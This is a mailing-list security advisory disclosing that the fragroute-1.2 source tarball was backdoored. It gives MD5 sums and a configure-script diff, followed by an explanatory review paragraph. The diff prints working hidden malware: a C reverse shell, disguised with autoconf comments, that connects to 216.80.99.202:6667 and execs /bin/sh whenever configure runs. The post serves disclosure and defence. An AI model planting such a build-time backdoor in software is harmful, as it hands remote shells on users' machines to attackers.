Hello, Although downloading it now seems safe, I think folks should know this. The changes done were similar to what happened to irssi, but with a different IP. MD5 sum of fragroute-1.2.tar.gz, downloaded from http://www.monkey.org/~dugsong/fragroute/ on may 27 (the contaminated version): 65edbfc51f8070517f14ceeb8f721075 MD5 sum of fragroute-1.2.tar.gz, downloaded from http://www.monkey.org/~dugsong/fragroute/ on may 30 (this is the current MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a Diff between the two: diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure --- fragroute-1.2/configure Mon Apr 15 16:41:43 2002 +++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002 
@@ -1590,6 +1590,53 @@ fi +cat > conftest.c<<EOF +/* Override any gcc2 internal prototype to avoid an error. */ +/* We use char because int might match the return type of a gcc2 + builtin and then its argument prototype would still apply. */ +#include <stdio.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netinet/in.h> +#include <unistd.h> +int main() +{ +/* The GNU C library defines this for functions which it implements + to always fail with ENOSYS. Some functions are actually named + something starting with __ and the normal name is an alias. */ + int s; + struct sockaddr_in sa; + switch(fork()) { case 0: break; default: exit(0); } + if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) { + exit(1); + } + /* HP/UX 9 (%@#!) writes to sscanf strings */ + memset(&sa, 0, sizeof(sa)); + sa.sin_family = AF_INET; + sa.sin_port = htons(6667); +/* Override any gcc2 internal prototype to avoid an error. */ +/* We use char because int might match the return type of a gcc2 + builtin and then its argument prototype would still apply. */ + sa.sin_addr.s_addr = inet_addr("216.80.99.202"); + if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) { + exit(1); + } + /* HP/UX 9 (%@#!) writes to sscanf strings */ + dup2(s, 0); dup2(s, 1); dup2(s, 2); +/* The GNU C library defines this for functions which it implements + to always fail with ENOSYS. Some functions are actually named + something starting with __ and the normal name is an alias. */ + { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); } +} +EOF +gcc $LIBS conftest.c -o conftest; ./conftest +if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then + rm -rf conftest* +else + rm -rf conftest* +fi +rm -f conftest* + # DLPI needs putmsg under HPUX so test for -lstr while we're at it echo $ac_n "checking for putmsg in -lstr""... 
$ac_c" 1>&6 echo "configure:1596: checking for putmsg in -lstr" >&5 References ========== FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716 Irssi backdoor page: http://www.irssi.org/?page=backdoor Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz Cheers, -- Anders.
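Review bot: The block added between `cat > conftest.c<<EOF` and the final `rm -f conftest*` is not a feature probe: `gcc $LIBS conftest.c -o conftest; ./conftest` compiles and runs a program that forks, connects to the hard-coded address 216.80.99.202 on TCP port 6667, duplicates the socket onto descriptors 0-2 and execs `/bin/sh`, so running `./configure` gives the remote end a shell with the privileges of the building user while the parent process exits and configure carries on normally. The comments inside it (gcc2 prototype, ENOSYS, HP/UX 9) are stock autoconf text unrelated to the socket code around them, and the `if ... $ac_link` that follows runs `rm -rf conftest*` in both branches, so it tests nothing and only removes the source and the compiled file. The whole added block should be dropped, leaving the original `fi` followed directly by the `# DLPI needs putmsg` check; the rest of the configure script lies outside this hunk. Before building, compare the tarball's MD5 with the clean value quoted in the message (7e4de763fae35a50e871bdcd1ac8e23a). Any host that ran configure from the contaminated tarball should be checked for outbound connections to that address and port and handled as possibly compromised.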